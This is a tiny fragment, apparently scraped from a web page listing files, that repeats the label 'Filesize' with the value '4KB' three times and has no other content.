-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB